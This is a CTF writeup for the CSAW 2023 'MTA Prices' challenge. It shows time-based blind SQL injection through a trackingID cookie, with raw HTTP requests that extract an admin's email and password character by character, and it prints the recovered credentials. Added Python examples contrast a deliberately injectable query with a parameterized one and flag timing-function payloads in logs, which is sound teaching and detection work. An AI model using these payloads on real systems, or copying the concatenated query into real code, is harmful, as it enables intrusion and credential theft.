CSAW CTF 2023 Writeup

MTA Prices

Time-based SQLi

How to identify

The trackingID value in the cookie can be used to influence the session content, which the server sends back in a response header.

Setting trackingID to an unexpected value makes the email field in the session show an "Error" message.

Importantly, this gives an opportunity to manipulate user input and look for anomalies in the response.


Proof of Concept

GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBk'+sleep(5)+'O4Fp2KuGsB;
Connection: keep-alive

If the email field shows no error (and the response is delayed by the sleep), the injected SQL was executed successfully.
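To show where the behaviour described above comes from on the server side, here is an added example (not the challenge's code, whose source is not part of the writeup): a session lookup that splices the trackingID cookie into the SQL text, beside a parameterized version of the same lookup. It uses an in-memory SQLite database instead of MySQL so it runs offline, and registers a stand-in sleep() that only records that it was called, so the writeup's probe value can be traced through both lookups without any delay. The table and column names are assumptions.

```python
import sqlite3

# Constructed stand-in for the app's session table (assumption: table and column
# names are invented here). SQLite is used in place of MySQL so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (tracking_id TEXT PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO sessions VALUES ('lAApPkDuBkO4Fp2KuGsB', 'user@example.com')")
    return conn

# Stand-in for MySQL's sleep(): records its argument instead of delaying, so the
# example shows whether the injected expression reached the database engine at all.
SLEEP_CALLS = []

def fake_sleep(seconds):
    SLEEP_CALLS.append(seconds)
    return 0

def lookup_vulnerable(conn, tracking_id):
    # The cookie value is spliced into the SQL text, so quotes and operators in it
    # become part of the query. A broken query surfaces as the "Error" the writeup saw.
    sql = "SELECT email FROM sessions WHERE tracking_id = '" + tracking_id + "'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Error"
    return row[0] if row else None

def lookup_safe(conn, tracking_id):
    # Parameter binding sends the cookie value separately from the SQL text, so it
    # is only ever compared as a literal string and never parsed as SQL.
    row = conn.execute(
        "SELECT email FROM sessions WHERE tracking_id = ?", (tracking_id,)
    ).fetchone()
    return row[0] if row else None

PROBE = "lAApPkDuBk'+sleep(5)+'O4Fp2KuGsB"   # the probe value from the writeup

def run_demo():
    conn = make_db()
    conn.create_function("sleep", 1, fake_sleep)
    out = {}
    SLEEP_CALLS.clear()
    out["vuln_valid"] = lookup_vulnerable(conn, "lAApPkDuBkO4Fp2KuGsB")
    out["vuln_malformed"] = lookup_vulnerable(conn, "lAApPkDuBk'")  # unbalanced quote
    out["vuln_probe"] = lookup_vulnerable(conn, PROBE)
    out["vuln_sleep_calls"] = list(SLEEP_CALLS)   # sleep() ran inside the query
    SLEEP_CALLS.clear()
    out["safe_probe"] = lookup_safe(conn, PROBE)
    out["safe_sleep_calls"] = list(SLEEP_CALLS)   # nothing ran: the value stayed a literal
    return out

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The three vulnerable calls reproduce the writeup's observations in order: a well-formed ID returns the email, a malformed value breaks the query and yields "Error", and the probe returns no error while the recorded sleep() call shows the injected expression was evaluated by the engine. The parameterized lookup never evaluates it.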


Exploitation

Replace ARG1 and ARG2 with your dictionaries…

ARG1: Numbers ranging from 0 to 20

ARG2: All printable characters, ASCII 32 to 126

Get admin’s email:

GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB'+(SELECT IF((select SUBSTRING(email,${ARG1},1) from users where privilege LIKE 'admin%' limit 0,1)=binary('${ARG2}'),SLEEP(10),'a'))+';
Connection: keep-alive

Get admin’s password:

GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB'+(SELECT IF((select SUBSTRING(password,${ARG1},1) from users where email='emily.brown@mta.com' limit 0,1)=binary('${ARG2}'),SLEEP(1),'a'))+';
Connection: keep-alive

mail -> emily.brown@mta.com
password -> p#2r@5ml8q7v!9x$1
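The character-by-character extraction above produces a long run of requests from one client, each carrying a trackingID with quotes and a timing function and each taking as long as the chosen SLEEP. The following is an added detection example (not part of the writeup) that scores access-log lines on three signals: a trackingID outside the expected alphabet, a timing function name in the cookie value, and a response latency far above the median. The log format, the sample lines and the assumption that legitimate tracking IDs are exactly 20 alphanumeric characters (as the writeup's value is) are all constructed here.

```python
import re
import statistics
from urllib.parse import unquote

# Constructed sample access-log lines (not from the writeup): timestamp, client,
# method, path, status, latency, and the trackingID cookie value as the server logged it.
SAMPLE_LOG = """\
2023-09-16T12:00:01Z 10.0.0.5 GET / 200 12ms trackingID=lAApPkDuBkO4Fp2KuGsB
2023-09-16T12:00:02Z 10.0.0.5 GET / 200 15ms trackingID=lAApPkDuBkO4Fp2KuGsB
2023-09-16T12:00:03Z 10.0.0.9 GET / 200 14ms trackingID=lAApPkDuBk'
2023-09-16T12:00:04Z 10.0.0.9 GET / 200 5014ms trackingID=lAApPkDuBk'+sleep(5)+'O4Fp2KuGsB
2023-09-16T12:00:15Z 10.0.0.9 GET / 200 10020ms trackingID=lAApPkDuBk'%2BSLEEP(10)%2B'O4Fp2KuGsB
2023-09-16T12:00:26Z 10.0.0.7 GET / 200 11ms trackingID=Qm7xT2vLp9RkW4nH8sYd
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "
    r"(?P<latency>\d+)ms trackingID=(?P<tid>.*)$"
)
# Assumption: a legitimate tracking ID is exactly 20 alphanumeric characters.
TID_RE = re.compile(r"^[A-Za-z0-9]{20}$")
# Timing primitives of the common SQL engines; matched case-insensitively on the
# URL-decoded cookie value.
TIMING_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I)

def parse(lines):
    rows = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        rows.append({
            "client": m["client"],
            "latency_ms": int(m["latency"]),
            "tid": unquote(m["tid"]),  # decode %2B etc. before inspecting
        })
    return rows

def analyze(lines, slow_factor=10):
    """Return one alert per suspicious request, listing the signals that fired."""
    rows = parse(lines)
    baseline = statistics.median(r["latency_ms"] for r in rows) if rows else 0
    alerts = []
    for r in rows:
        reasons = []
        if not TID_RE.match(r["tid"]):
            reasons.append("malformed_tracking_id")
        if TIMING_RE.search(r["tid"]):
            reasons.append("timing_function_in_cookie")
        if baseline and r["latency_ms"] > slow_factor * baseline:
            reasons.append("latency_anomaly")
        if reasons:
            alerts.append({"client": r["client"], "tid": r["tid"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert["client"], alert["reasons"], alert["tid"])
```

The malformed-ID check fires first, on the very request that produced the "Error" the writeup used to identify the injection point, before any delay is observable; the latency signal is computed relative to the median of the window rather than a fixed threshold, so it adapts to the site's normal response time.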


Reference

https://www.kirsle.net/wizards/flask-session.cgi

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md#extract-database-with-information_schema

https://superboy-zjc.github.io/2020/08/05/阶段四、Web渗透测试/7、SQL注入/#二、SQL注入的注入点